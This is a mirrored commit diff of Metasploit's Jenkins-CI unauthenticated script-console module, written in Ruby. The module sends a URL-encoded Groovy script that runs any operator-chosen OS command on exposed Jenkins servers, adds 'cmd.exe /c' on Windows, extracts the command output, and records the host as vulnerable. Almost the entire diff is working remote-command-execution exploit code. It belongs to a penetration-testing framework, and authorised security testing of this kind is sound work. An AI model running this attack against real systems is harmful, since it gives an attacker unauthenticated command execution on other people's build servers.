infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Rework of the jenkins_command module

bug/bundler_fix
HD Moore 2015-09-04 16:56:44 -07:00
parent 04d622b69b
commit 421fb4dcb8
1 changed files with 66 additions and 40 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

106
modules/auxiliary/scanner/http/jenkins_command.rb
View File

@ -5,7 +5,7 @@
require 'rex/proto/http'
require 'msf/core'
require 'rexml/document'
require 'cgi'
class Metasploit3 < Msf::Auxiliary
@ -17,8 +17,8 @@ class Metasploit3 < Msf::Auxiliary
super(update_info(info,
'Name' => 'Jenkins-CI Unauthenticated Script-Console Scanner',
'Description' => %q{
This module takes advantage of the lack of password on Jenkins web applications
and automates the command execution aspect (via groovy script).
This module scans for unauthenticated Jenkins-CI script consoles and
executes the specified command.
},
'Author' =>
[
@ -26,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary
'Jeffrey Cap'
],
'References' => [
['URL', 'https://www.pentestgeek.com/penetration-testing/hacking-jenkins-servers-with-no-password/']
['URL', 'https://www.pentestgeek.com/penetration-testing/hacking-jenkins-servers-with-no-password/'],
['URL', 'https://wiki.jenkins-ci.org/display/JENKINS/Jenkins+Script+Console'],
],
'License' => MSF_LICENSE
@ -37,61 +37,87 @@ class Metasploit3 < Msf::Auxiliary
OptString.new('TARGETURI', [ true, 'The path to the Jenkins-CI application', '/jenkins/' ]),
OptString.new('COMMAND', [true, 'Command to run in application', 'whoami']),
], self.class)
deregister_options('VHOST')
end
def fingerprint_os(ip)
res = send_request_cgi(
{
'uri' => "#{target_uri.path}systemInfo",
'method' => 'GET',
'ctype' => 'application/x-www-form-urlencoded'
}
).body.to_s
unless res.nil?
if res.scan(/os.name(.*?)os.version/m).to_s.downcase.include? "windows"
return "cmd.exe /c"
else
return ""
end
res = send_request_cgi({'uri' => "#{target_uri.path}systemInfo"})
# Verify that we received a proper systemInfo response
unless res && res.body.to_s.length > 0
vprint_error("#{peer} - The server did not reply to our systemInfo request")
end
unless res.body.index("System Properties") &&
res.body.index("Environment Variables")
if res.body.index('Remember me on this computer')
vprint_error("#{peer} This Jenkins-CI system requires authentication")
else
vprint_error("#{peer} This system is not running Jenkins-CI at #{datastore['TARGETURI']}")
end
return
end
os_info = pattern_extract(/os.name(.*?)os.version/m, res.body).first
os_info.index(">Windows") ? "cmd.exe /c " : ""
end
def run_host(ip)
command = datastore['COMMAND'].gsub("\\", "\\\\\\")
prefix = fingerprint_os(ip)
res = send_request_cgi(
{
return if prefix.nil?
res = send_request_cgi({
'uri' => "#{target_uri.path}script",
'method' => 'POST',
'ctype' => 'application/x-www-form-urlencoded',
'data' => "script=def+sout+%3D+new+StringBuffer%28%29%2C+serr+%3D+new+StringBuffer%28%29%0D%0Adef+proc+%3D+%27#{prefix}+#{command}%27.execute%28%29%0D%0Aproc.consumeProcessOutput%28sout%2C+serr%29%0D%0Aproc.waitForOrKill%281000%29%0D%0Aprintln+%22out%26gt%3B+%24sout+err%26gt%3B+%24serr%22%0D%0A&json=%7B%22script%22%3A+%22def+sout+%3D+new+StringBuffer%28%29%2C+serr+%3D+new+StringBuffer%28%29%5Cndef+proc+%3D+%27#{prefix}+#{command}%27.execute%28%29%5Cnproc.consumeProcessOutput%28sout%2C+serr%29%5Cnproc.waitForOrKill%281000%29%5Cnprintln+%5C%22out%26gt%3B+%24sout+err%26gt%3B+%24serr%5C%22%5Cn%22%2C+%22%22%3A+%22def+sout+%3D+new+StringBuffer%28%29%2C+serr+%3D+new+StringBuffer%28%29%5Cndef+proc+%3D+%27#{prefix}+#{command}%27.execute%28%29%5Cnproc.consumeProcessOutput%28sout%2C+serr%29%22%7D&Submit=Run"
}).body.to_s
if res.nil?
print_error("#{rhost}:#{rport} - An unknown error occurred when running the command.")
})
unless res && res.body.to_s.length > 0
vprint_error("#{peer} No response received from the server.")
return
end
plugin_output, command_output = pattern_extract(/<pre>(.*?)<\/pre>/m, res.body.to_s)
if plugin_output !~ /Jenkins\.instance\.pluginManager\.plugins/
vprint_error("#{peer} The server returned an invalid response.")
return
end
# The output is double-HTML encoded
output = CGI.unescapeHTML(CGI.unescapeHTML(command_output.to_s)).
gsub(/\s*(out|err)>\s*/m, '').
strip
if output =~ /^java\.[a-zA-Z\.]+\:\s*([^\n]+)\n/
output = $1
print_good("#{peer} The server is vulnerable, but the command failed: #{output}")
else
output = res.scan(/<pre>(.*?)<\/pre>/m)
if output.to_s.include? "java.lang.Runtime.exec" or output.to_s.include? "not recognized"
print_error("#{rhost}:#{rport} - Invalid command provided to the OS.")
report_data(ip, rport, "The command #{command} was not valid on the remote host.")
elsif !output.empty? and !output.to_s.include? "java.lang.Runtime.exec"
output = output[1][0][12..-1].gsub("err&amp;gt;", "").strip
print_good("#{rhost}:#{rport}: The command executed successfully on #{ip}. Output:")
report_data(ip, rport, "The command #{command} executed successfully.")
output.split("\n").each{|line| print_good("#{rhost}:#{rport}: #{line.strip}")}
else
print_error("#{rhost}:#{rport} - An unknown error has occured when running the command.")
report_data(ip, rport, "The command #{command} did not execute successfully.")
output.split("\n").each do |line|
print_good("#{peer} #{line.strip}")
end
end
report_vulnerable(output)
end
def report_data(ip, rport, result)
report_service(
:host => ip,
:port => datastore['RPORT'],
def pattern_extract(pattern, buffer)
buffer.to_s.scan(pattern).map{ |m| m.first }
end
def report_vulnerable(result)
report_vuln(
:host => rhost,
:port => rport,
:proto => 'tcp',
:info => result
:sname => ssl ? 'https' : 'http',
:name => self.name,
:info => result,
:refs => self.references,
:exploited_at => Time.now.utc
)
end
end